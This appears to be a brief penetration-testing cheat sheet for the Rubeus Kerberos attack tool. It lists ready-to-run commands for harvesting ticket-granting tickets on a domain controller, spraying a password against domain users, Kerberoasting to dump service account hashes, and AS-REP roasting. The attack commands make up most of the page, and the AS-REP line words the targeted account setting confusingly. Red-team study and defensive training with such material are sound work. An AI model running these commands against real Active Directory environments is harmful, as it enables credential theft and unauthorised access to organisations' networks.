Rubeus
Ticket Harvesting
Listen for incoming TGT calls on the DC. Allows to harvest TGT tickets and users in the domain
Rubeus.exe harvest /interval:<seconds>
Password Spraying
Allows to spray a selected password against the users detected with the previous attack
Rubeus.exe brute /password:<password> /noticket
Kerberoast
Returns a list of services vulnerable to Kerberoast attacks and relative Kerberos Hash
Rubeus.exe kerberoast /stats #get information on vulnerable accounts
Rubeus.exe kerberoast #dump hashes
AS-REP Roasting
Returns hashes of users with the flag "Do not require Kerberos pre-authentication" disabled
Rubeus.exe asreproast
Last updated